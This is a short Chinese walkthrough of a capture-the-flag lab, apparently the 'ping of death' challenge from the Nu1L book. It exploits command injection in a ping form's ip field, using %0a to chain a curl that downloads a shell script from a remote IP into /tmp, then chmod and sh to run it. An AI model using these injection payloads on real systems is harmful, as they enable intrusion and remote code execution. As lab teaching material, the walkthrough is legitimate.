当前位置: 首页 > article >正文

nu1l-死亡ping命令攻略

book-nu1l

docker

使用bp抓包放进中继

image-20231026200308696

将ip部分修改为,传过去sh文件

ip=127.0.0.1%0acurl 10.9.47.141/9.sh > /tmp/9.sh

image-20231026203006712

赋权

127.0.0.1%0achmod 777 /tmp/9.sh

image-20231026203026565

执行文件

127.0.0.1%0ash /tmp/9.sh

image-20231026203056597

得到flag

如果实在某些靶场内,获取flag则需要修改执行命令为ls /tmp或/root下

image-20231026203116883


http://www.kler.cn/a/106380.html

相关文章:

  • Git 中的 patch 功能
  • FreeSWITCH chat 得到的是 Error! Message Not Sent
  • 【python】用 Scrapy 实现高效爬虫项目
  • vxe-grid table 校验指定行单元格的字段,只校验某个列的字段
  • GitHub新手入门 - 从创建仓库到协作管理
  • C#界面设计
  • postman接收后端返回的文件流并自动下载
  • bug:Chrome插件SwitchyOmega安装时程序包无效:“CRX_HEADER_INVALID“问题
  • 最优秀的完整的数字音频工作站水果音乐FL Studio21.1.1.3750中文解锁版
  • python+unittest+requests+HTMLRunner编写接口自动化测试集
  • 时间、空间复杂度的例题详解
  • LVS集群-DR模式
  • es之null_value
  • esp8266固件烧录用户手册
  • mac系统u盘启动盘制作教程,更新至macOS Sonoma 14
  • Xilinx的FIR滤波器IP的设计与仿真
  • Django 注册及创建订单商品
  • fl studio21水果新手要不要购买?
  • 推荐一款适合科技行业的CRM系统
  • 电脑定时关机
  • HTTP发起请求与收到响应的大致过程
  • N-129基于springboot,vue学生宿舍管理系统
  • Flink几个性能调优
  • 关于JAVA中字节码文件版本号、产品版本号及开发版本号的关系
  • 0基础学习PyFlink——用户自定义函数之UDTF
  • 机器学习-朴素贝叶斯之多项式模型